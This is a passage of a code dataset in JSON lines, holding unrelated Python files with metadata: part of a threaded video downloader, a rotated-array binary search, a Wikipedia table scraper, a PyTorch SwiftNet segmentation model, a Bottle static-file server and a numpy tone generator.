download_worker():\n\tglobal stopped\n\tlist_count = build_list() # Build list so there is a starting point\n\twhile not stopped:\n\t\twith lock:\n\t\t\tlist_count = len(url_list)\n\t\tif (list_count > 3):\n\t\t\tdownload_url()\n\t\telse:\n\t\t\ttime.sleep(1)\n\ndef stop_worker():\n\tglobal stopped\n\twhile not stopped:\n\t\tresponse = input(\"\\nType 'stop' and press enter to interrupt the download\\n\")\n\t\tif response:\n\t\t\tif 'stop' in response: # Break if response contains stop\n\t\t\t\tstopped = True # Set stopped to true so list_worker quits\n\t\t\t\tprint (\"\\nStopping...\\n\")\n\nlist_worker = threading.Thread(target=list_worker)\ndownload_worker = threading.Thread(target=download_worker)\nstop_worker = threading.Thread(target=stop_worker)\nstop_worker.start()\ndownload_worker.start()\nlist_worker.start()\ndownload_worker.join() # Wait for download_worker to finish\nsave_data(name)\nprint (\"\\nVideo has been saved. 
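The three workers above coordinate through a shared `stopped` flag plus a lock around `url_list`; the standard-library `queue.Queue` and `threading.Event` express the same producer/consumer shape with less shared state. A generic, network-free sketch:

import queue
import threading
import time

stop = threading.Event()
chunks = queue.Queue()              # replaces the list + lock pair

def producer():
    while not stop.is_set():
        chunks.put("segment-url")   # stand-in for a discovered chunk
        time.sleep(0.1)

def consumer():
    while not stop.is_set() or not chunks.empty():
        try:
            item = chunks.get(timeout=0.2)   # download/save item here
        except queue.Empty:
            continue

threads = [threading.Thread(target=f) for f in (producer, consumer)]
for t in threads:
    t.start()
time.sleep(0.5)
stop.set()
for t in threads:
    t.join()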
Press enter to quit.\\n\")\n", "sub_path": "downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 3912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "browsercookie.chrome", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 24, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 131, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 132, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "464555959", "text": "# 81. Search in Rotated Sorted Array II\n# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n#\n# (For example, [0,0,1,2,2,5,6] might become [2,5,6,0,0,1,2].)\n#\n# Write a function to determine whether a given target value exists in the array. Return true if it exists, false otherwise.\n\n\nfrom typing import List\n\n\nclass Solution:\n # compare the middle element with the left boundary\n def search(self, nums: List[int], target: int) -> bool:\n size = len(nums)\n if size == 0:\n return False\n\n left = 0\n right = size - 1\n\n while left < right:\n mid = (left + right) >> 1\n if nums[mid] > nums[left]:\n if nums[left] <= target <= nums[mid]:\n # target falls inside the left, sorted part\n right = mid\n else:\n left = mid + 1\n elif nums[mid] < nums[left]:\n # keep this branch symmetrical with the one above\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid\n else:\n # before discarding the left boundary, check whether it can be excluded\n if nums[left] == target:\n return True\n left = left + 1\n # post-processing: after the bounds converge, still check whether this is the target\n return nums[left] == target\n", "sub_path": "17-二分查找/0081-搜索旋转排序数组 II-2.py", "file_name": "0081-搜索旋转排序数组 II-2.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "556490473", "text": "import csv,sqlite3\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/List_of_universities_and_higher_education_colleges_in_London\")\nsoup = BeautifulSoup(html,'html.parser')\n\ntable = soup.find_all('table',{'class':'wikitable'})[0]\nrows = table.find_all('tr')\n\ncsvFile = open('crawling/data/LondonUni.csv','wt', newline = '', encoding ='utf-8')\n\nwrite=csv.writer(csvFile)\n\ntry:\n for row in rows:\n csvRow=[]\n for cell in row.find_all(['td','th']):\n csvRow.append(cell.get_text())\n write.writerow(csvRow)\n\nfinally:\n print('Saved as CSV')\n csvFile.close()\n", "sub_path": "crawling/data/LondonUnisqlite.py", "file_name": "LondonUnisqlite.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.urlopen", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "616256641", "text": "import torch,torch.nn as 
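Assuming the `Solution` class from the record above is importable, a quick check against the array from the problem statement exercises both outcomes:

s = Solution()
print(s.search([2, 5, 6, 0, 0, 1, 2], 0))  # True  - target present
print(s.search([2, 5, 6, 0, 0, 1, 2], 3))  # False - target absent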
nn\nimport torch.nn.functional as F\nfrom .GuidedFilter.guided_filter import ConvGuidedFilter\n'''\n使用Swichable Norm\n'''\nclass SwitchNorm2d(nn.Module):\n\tdef __init__(self, num_features, eps=1e-5, momentum=0.9, using_moving_average=True, using_bn=True,\n\t\t\t\tlast_gamma=False):\n\t\tsuper(SwitchNorm2d, self).__init__()\n\t\tself.eps = eps\n\t\tself.momentum = momentum\n\t\tself.using_moving_average = using_moving_average\n\t\tself.using_bn = using_bn\n\t\tself.last_gamma = last_gamma\n\t\tself.weight = nn.Parameter(torch.ones(1, num_features, 1, 1))\n\t\tself.bias = nn.Parameter(torch.zeros(1, num_features, 1, 1))\n\t\tif self.using_bn:\n\t\t\tself.mean_weight = nn.Parameter(torch.ones(3))\n\t\t\tself.var_weight = nn.Parameter(torch.ones(3))\n\t\telse:\n\t\t\tself.mean_weight = nn.Parameter(torch.ones(2))\n\t\t\tself.var_weight = nn.Parameter(torch.ones(2))\n\t\tif self.using_bn:\n\t\t\tself.register_buffer('running_mean', torch.zeros(1, num_features, 1))\n\t\t\tself.register_buffer('running_var', torch.zeros(1, num_features, 1))\n\n\t\tself.reset_parameters()\n\n\tdef reset_parameters(self):\n\t\tif self.using_bn:\n\t\t\tself.running_mean.zero_()\n\t\t\tself.running_var.zero_()\n\t\tif self.last_gamma:\n\t\t\tself.weight.data.fill_(0)\n\t\telse:\n\t\t\tself.weight.data.fill_(1)\n\t\tself.bias.data.zero_()\n\n\tdef _check_input_dim(self, input):\n\t\tif input.dim() != 4:\n\t\t\traise ValueError('expected 4D input (got {}D input)'\n\t\t\t\t\t\t\t.format(input.dim()))\n\n\tdef forward(self, x):\n\t\tself._check_input_dim(x)\n\t\tN, C, H, W = x.size()\n\t\tx = x.view(N, C, -1)\n\t\tmean_in = x.mean(-1, keepdim=True)\n\t\tvar_in = x.var(-1, keepdim=True)\n\n\t\tmean_ln = mean_in.mean(1, keepdim=True)\n\t\ttemp = var_in + mean_in ** 2\n\t\tvar_ln = temp.mean(1, keepdim=True) - mean_ln ** 2\n\n\t\tif self.using_bn:\n\t\t\tif self.training:\n\t\t\t\tmean_bn = mean_in.mean(0, keepdim=True)\n\t\t\t\tvar_bn = temp.mean(0, keepdim=True) - mean_bn ** 2\n\t\t\t\tif self.using_moving_average:\n\t\t\t\t\tself.running_mean.mul_(self.momentum)\n\t\t\t\t\tself.running_mean.add_((1 - self.momentum) * mean_bn.data)\n\t\t\t\t\tself.running_var.mul_(self.momentum)\n\t\t\t\t\tself.running_var.add_((1 - self.momentum) * var_bn.data)\n\t\t\t\telse:\n\t\t\t\t\tself.running_mean.add_(mean_bn.data)\n\t\t\t\t\tself.running_var.add_(mean_bn.data ** 2 + var_bn.data)\n\t\t\telse:\n\t\t\t\tmean_bn = torch.autograd.Variable(self.running_mean)\n\t\t\t\tvar_bn = torch.autograd.Variable(self.running_var)\n\n\t\tsoftmax = nn.Softmax(0)\n\t\tmean_weight = softmax(self.mean_weight)\n\t\tvar_weight = softmax(self.var_weight)\n\n\t\tif self.using_bn:\n\t\t\tmean = mean_weight[0] * mean_in + mean_weight[1] * mean_ln + mean_weight[2] * mean_bn\n\t\t\tvar = var_weight[0] * var_in + var_weight[1] * var_ln + var_weight[2] * var_bn\n\t\telse:\n\t\t\tmean = mean_weight[0] * mean_in + mean_weight[1] * mean_ln\n\t\t\tvar = var_weight[0] * var_in + var_weight[1] * var_ln\n\n\t\tx = (x-mean) / (var+self.eps).sqrt()\n\t\tx = x.view(N, C, H, W)\n\t\treturn x * self.weight + self.bias\n\t\t\nclass BasicBlock(nn.Module):\n\texpansion = 1\n\tdef __init__(self,in_dim,out_dim,stride=1,downsample=None,norm=False):\n\t\tsuper(BasicBlock,self).__init__()\n\t\tself.norm=norm\n\t\tself.conv1=nn.Conv2d(in_dim,out_dim,3,stride,1)\n\t\tself.norm1 = SwitchNorm2d(out_dim) if self.norm else None\n\t\tself.relu=nn.ReLU(inplace=True)\n\t\tself.conv2=nn.Conv2d(out_dim,out_dim,3,1,1)\n\t\tself.norm2 = SwitchNorm2d(out_dim) if self.norm else 
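`SwitchNorm2d` above derives instance-, layer-, and batch-statistics from the same per-(N, C) means and blends them with softmax-normalized learnable weights; a stripped-down numeric sketch of just that blend (no affine parameters, weights frozen at uniform):

import torch
import torch.nn.functional as F

x = torch.randn(4, 8, 16, 16).view(4, 8, -1)
mean_in = x.mean(-1, keepdim=True)        # (N, C, 1): instance-norm statistics
mean_ln = mean_in.mean(1, keepdim=True)   # (N, 1, 1): layer-norm statistics
mean_bn = mean_in.mean(0, keepdim=True)   # (1, C, 1): batch-norm statistics

w = F.softmax(torch.zeros(3), dim=0)      # learnable in the real module
mean = w[0] * mean_in + w[1] * mean_ln + w[2] * mean_bn   # broadcast blend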
None\n\t\tself.downsample=downsample\n\tdef forward(self,x):\n\t\tresidual=x\n\t\tif self.norm:\n\t\t\tout=self.relu(self.norm1(self.conv1(x)))\n\t\t\tout=self.norm2(self.conv2(out))\n\t\telse :\n\t\t\tout=self.relu(self.conv1(x))\n\t\t\tout=self.conv2(out)\n\t\tif self.downsample is not None:\n\t\t\tresidual=self.downsample(residual)\n\t\tskip=out+residual\n\t\tout=self.relu(skip)#改了。。\n\t\treturn skip,out\nclass ResNet18(nn.Module):\n\tdef __init__(self,color=4,layers=[2,2,2,2],features=[16,32,64,64],norm=False):\n\t\tself.inplanes=features[0]\n\t\tself.norm=norm\n\t\tsuper(ResNet18,self).__init__()\n\t\tself.conv1 = nn.Conv2d(color, features[0], kernel_size=7, stride=2, padding=3,\n\t\t\t\t\t\t\tbias=True)\n\t\tself.norm1=SwitchNorm2d(features[0]) if self.norm else None\n\t\tself.relu = nn.ReLU(inplace=True)\n\t\tself.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\t\tblock=BasicBlock\n\t\tself.layer1 = self._make_layer(block, features[0], layers[0])\n\t\tself.layer2 = self._make_layer(block, features[1], layers[1], stride=2)\n\t\tself.layer3 = self._make_layer(block, features[2], layers[2], stride=2)\n\t\tself.layer4 = self._make_layer(block, features[3], layers[3], stride=2)\n\tdef _make_layer(self, block, planes, blocks, stride=1):\n\t\tdownsample = None\n\t\tif stride != 1 or self.inplanes != planes * block.expansion:\n\t\t\tdownsample = nn.Sequential(\n\t\t\t\tnn.Conv2d(self.inplanes, planes * block.expansion,\n\t\t\t\t\t\tkernel_size=1, stride=stride, bias=False))\n\t\tlayers = []\n\t\tlayers.append(block(self.inplanes, planes, stride, downsample,norm=self.norm))\n\t\tself.inplanes = planes * block.expansion\n\t\tfor i in range(1, blocks):\n\t\t\tlayers.append(block(self.inplanes, planes,norm=self.norm))\n\t\treturn nn.Sequential(*layers)\n\tdef forward_layer(self, x, layer):\n\t\tskip = None\n\t\tfor l in layer:\n\t\t\tx = l(x)\n\t\t\tif isinstance(x, tuple):\n\t\t\t\tskip,x = x\n\t\treturn skip,x\n\tdef forward(self,x1):\n\t\tx2=self.relu(self.conv1(x1))\n\t\tx4=self.maxpool(x2)\n\t\tx4,x=self.forward_layer(x4,self.layer1)\n\t\tx8,x=self.forward_layer(x,self.layer2)\n\t\tx16,x=self.forward_layer(x,self.layer3)\n\t\tx32,x=self.forward_layer(x,self.layer4)\n\t\treturn x1,x2,x4,x8,x16,x32\n\n\nupsample = lambda x, size: F.interpolate(x, size, mode='bilinear', align_corners=False)\nclass ReluConv(nn.Sequential):\n\tdef __init__(self, in_dim, out_dim,k=3,norm=False):\n\t\tsuper(ReluConv, self).__init__()\n\t\tif norm:\n\t\t\tself.add_module('norm', SwitchNorm2d(in_dim))#使用BN\n\t\tself.add_module('relu', nn.ReLU(inplace=False))\n\t\tself.add_module('conv', nn.Conv2d(in_dim, out_dim, kernel_size=k, padding=k//2))\nclass SpatialPyramidPooling(nn.Module):\n\tdef __init__(self, num_maps_in, num_levels=3, bt_size=128, out_size=128,grids=(8, 4, 2, 1), square_grid=False,fixed_size=None,norm=False):\n\t\tsuper(SpatialPyramidPooling, self).__init__()\n\t\tlevel_size = out_size // num_levels\n\t\tself.fixed_size = fixed_size\n\t\tself.grids = grids\n\t\tif self.fixed_size:\n\t\t\tref = min(self.fixed_size)\n\t\t\tself.grids = list(filter(lambda x: x <= ref, self.grids))\n\t\tself.square_grid = square_grid\n\t\tself.upsampling_method = upsample\n\t\tif self.fixed_size is not None:\n\t\t\tself.upsampling_method = lambda x, size: F.interpolate(x, mode='nearest', size=fixed_size)\n\t\tself.spp = nn.Sequential()\n\t\tself.spp.add_module('spp_bn', ReluConv(num_maps_in, bt_size, k=1,norm=norm))\n\t\tnum_features = bt_size\n\t\tfinal_size = num_features\n\t\tfor i in 
range(num_levels):\n\t\t\tfinal_size += level_size\n\t\t\tself.spp.add_module('spp' + str(i),ReluConv(num_features, level_size, k=1,norm=norm))\n\t\tself.spp.add_module('spp_fuse',ReluConv(final_size, out_size, k=1,norm=norm))\n\tdef forward(self, x):\n\t\tlevels = []\n\t\ttarget_size = self.fixed_size if self.fixed_size is not None else x.size()[2:4]\n\t\tar = target_size[1] / target_size[0]\n\t\tx = self.spp[0].forward(x)\n\t\tlevels.append(x)\n\t\tnum = len(self.spp) - 1\n\t\tfor i in range(1, num):\n\t\t\tif not self.square_grid:\n\t\t\t\tgrid_size = (self.grids[i - 1], max(1, round(ar * self.grids[i - 1])))\n\t\t\t\tx_pooled = F.adaptive_avg_pool2d(x, grid_size)#input,output_size\n\t\t\telse:\n\t\t\t\tx_pooled = F.adaptive_avg_pool2d(x, self.grids[i - 1])\n\t\t\tlevel = self.spp[i].forward(x_pooled)\n\t\t\tlevel = self.upsampling_method(level, target_size)\n\t\t\tlevels.append(level)\n\t\tx = torch.cat(levels, 1)\n\t\tx = self.spp[-1].forward(x)\n\t\treturn x\nclass _Upsample(nn.Module):\n\tdef __init__(self, num_maps_in, skip_maps_in, num_maps_out, k=3,norm=False):\n\t\tsuper(_Upsample, self).__init__()\n\t\tself.skip_conv = ReluConv(skip_maps_in, num_maps_in, k=1,norm=norm)\n\t\tself.blend_conv = ReluConv(num_maps_in, num_maps_out, k=k,norm=norm)\n\t\tself.upsampling_method = upsample\n\tdef forward(self,skip,x):\n\t\tskip = self.skip_conv.forward(skip)\n\t\tskip_size = skip.size()[2:4]\n\t\tx = self.upsampling_method(x, skip_size)#x.size()->skip.size()!!\n\t\tx = x + skip #element add\n\t\tx = self.blend_conv.forward(x)\n\t\treturn x\nclass Decoder(nn.Module):#out_dim=128 decoder to x4\n\tdef __init__(self,features=[16,32,64,64],in_dim=64,norm=False):\n\t\tsuper(Decoder,self).__init__()\n\t\tself.up1=_Upsample(in_dim,features[-2],features[-2],norm=norm)#original outdim=128\n\t\tself.up2=_Upsample(features[-2],features[-3],features[-3],norm=norm)\n\t\tself.up3=_Upsample(features[-3],features[-4],features[-4],norm=norm)\n\tdef forward(self,x32,x16,x8,x4):\n\t\tout=self.up1(x16,x32)#x16\n\t\tout=self.up2(x8,out)#x8\n\t\tout=self.up3(x4,out)#x4\n\t\treturn out\nclass AdaptiveNorm(nn.Module):\n\tdef __init__(self, n):\n\t\tsuper(AdaptiveNorm, self).__init__()\n\t\tself.w_0 = nn.Parameter(torch.Tensor([1.0]))\n\t\tself.w_1 = nn.Parameter(torch.Tensor([0.0]))\n\t\tself.bn = SwitchNorm2d(n, momentum=0.999, eps=0.001)\n\tdef forward(self, x):\n\t\treturn self.w_0 * x + self.w_1 * self.bn(x)\n\nclass SwiftNetSlim_GFL_SN(nn.Module):\n\tdef __init__(self,incolor=4,outcolor=3,features=[16,32,64,64],norm=False):\n\t\tsuper(SwiftNetSlim_GFL_SN,self).__init__()\n\t\tself.sppdim=64 #original 128\n\t\tself.encoder=ResNet18(incolor,features=features,norm=norm)#original features:[64,128,256,512]\n\t\tself.spp=SpatialPyramidPooling(features[-1],out_size=self.sppdim,norm=norm)\n\t\tself.decoder=Decoder(features,in_dim=self.sppdim,norm=norm)\n\t\tself.post=ReluConv(features[-4],outcolor,1,norm=norm)\n\t\tself.filter = ConvGuidedFilter(1, norm=AdaptiveNorm)\n\t\tself.guided_map = nn.Sequential(\n\t\t\tnn.Conv2d(3, 16, 1, bias=False),\n\t\t\tAdaptiveNorm(16),\n\t\t\tnn.LeakyReLU(0.2, inplace=True),\n\t\t\tnn.Conv2d(16, 3, 1)\n\t\t)\n\tdef forward(self,x):\n\t\timage_size=x.size()[2:4]\n\t\tx1,x2,x4,x8,x16,x32=self.encoder(x)\n\t\tx32=self.spp(x32)\n\t\tout_x4=self.decoder(x32,x16,x8,x4)\n\t\tout_x4=self.post(out_x4)\n\t\t# out=upsample(out_x4,image_size)\n\t\tx_h=x[:,:3,::];x_l=F.interpolate(x_h,scale_factor=0.25)\n\t\tout=self.filter(self.guided_map(x_l),out_x4,self.guided_map(x_h))\n\t\treturn 
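The SPP forward above is, at its core, pool-to-grid, upsample back, concatenate; stripped of the 1x1 convolutions it reduces to a few lines (grid sizes are the record's defaults):

import torch
import torch.nn.functional as F

x = torch.randn(1, 64, 32, 32)
levels = [x]
for g in (8, 4, 2, 1):
    pooled = F.adaptive_avg_pool2d(x, g)   # g x g spatial summary
    levels.append(F.interpolate(pooled, size=x.shape[2:],
                                mode="bilinear", align_corners=False))
out = torch.cat(levels, dim=1)
print(out.shape)   # torch.Size([1, 320, 32, 32]) before the fuse conv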
out_x4,out\n\nif __name__ == \"__main__\":\n\n\t#devisor=32\n\tx=torch.zeros([1,4,160,160])\n\tnet=SwiftNetSlim_GFL_SN(norm=True)\n\tprint(sum([p.numel() for p in net.parameters()]))\n\t# net(x)\n\tprint(net)\n\n\t\n", "sub_path": "net/deprecated/models/SwiftNetSlim_GFL_SN.py", "file_name": "SwiftNetSlim_GFL_SN.py", "file_ext": "py", "file_size_in_byte": 10052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 87, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 119, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 120, 
"usage_type": "call"}, {"api_name": "torch.nn", "line_number": 120, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.functional.adaptive_avg_pool2d", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.nn.functional.adaptive_avg_pool2d", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 203, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 216, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 236, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "GuidedFilter.guided_filter.ConvGuidedFilter", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn", 
"line_number": 248, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 258, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 265, "usage_type": "call"}]} +{"seq_id": "635348556", "text": "\"\"\"\nSet up website, point to index.html and supporting files. \n\nThink MVC not directory structure!\nOrig path: '/LOC/Falcon/Falcon/static'\n\"\"\"\n\nimport bottle as web\nimport os\n\n\n# Simple primary file (basic network force)\n@web.route('/simple')\ndef index():\n path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n print('path: ' + path)\n return web.static_file('simple.html', root=path)\n\n\n# Primary file (Family Network Force via template)\n@web.route('/')\n@web.route('/')\n@web.view('d3andme')\ndef index(name='World'):\n #path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n #print('path: ' + path)\n return dict(name=name)\n\n\n# Resource files\n@web.route('/resource/')\ndef index(filename):\n res_path = os.path.dirname(os.path.realpath(__file__)) + r'\\resources'\n print('res_path: ' + res_path)\n return web.static_file(filename, root=res_path)\n\n\n# Application files\n@web.route('/app/')\ndef index(filename):\n app_path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n print('app_path: ' + app_path)\n return web.static_file(filename, root=app_path)\n\n\n# Data files\n@web.route('/data/')\ndef index(filename):\n data_path = os.path.dirname(os.path.realpath(__file__)) + r'\\data'\n print('data_path: ' + data_path)\n return web.static_file(filename, root=data_path)\n\n\nweb.run(host='localhost', port=8080, debug=True)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 15, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 17, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 13, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 22, "usage_type": "call"}, {"api_name": "bottle.view", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 33, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 35, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 41, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 43, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.realpath", 
"line_number": 49, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 51, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 47, "usage_type": "call"}, {"api_name": "bottle.run", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "278561451", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import write\n\ntid = 2\nfs = 8000\nf = 440\ntt = np.arange(0, tid, 1/fs)\nx = np.cos(2*np.pi*f*tt)\nplt.plot(tt[1:200],x[1:200])\nplt.show()\n# write('uppg1.wav', fs, x)\n", "sub_path": "RÖ1/RO1_uppg1.py", "file_name": "RO1_uppg1.py", "file_ext": "py", "file_size_in_byte": 235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": 